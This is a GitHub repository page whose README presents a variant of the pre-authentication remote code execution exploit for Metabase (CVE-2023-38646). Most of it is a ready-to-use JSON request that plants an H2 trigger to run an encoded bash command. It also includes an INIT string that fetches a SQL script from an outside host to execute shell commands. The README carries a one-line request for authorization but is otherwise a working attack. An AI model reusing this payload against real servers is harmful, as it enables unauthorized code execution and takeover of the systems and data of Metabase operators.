Skip to content

0utl4nder/Another-Metabase-RCE-CVE-2023-38646

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here

This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines)

{
"token": "TOKEN",
"details":
{
 "is_on_demand": false,
 "is_full_sync": false,
 "is_sample": false,
 "cache_ttl": null,
 "refingerprint": false,
 "auto_run_queries": true,
 "schedules":{},
 "details":
 {
  "advanced-options":true,
  "classname":"org.h2.Driver",
  "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
  "subprotocol": "h2"
 },
 "engine": "postgres",
 "name": "x"
}}

Instead of using directly h2 as engine with the INIT script, since its removed from our queries, we still using the db query for h2 engine

INIT script mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'

In the .sql you specify the way to exec shell commands

REFERENCE

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

Written as a note, take it as vague documentation, you must have authorization to enumerate, exploit or simply test against any target

Comments and contributions are welcome

About

Metabase postgres (org.h2.Driver) RCE without INIT

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository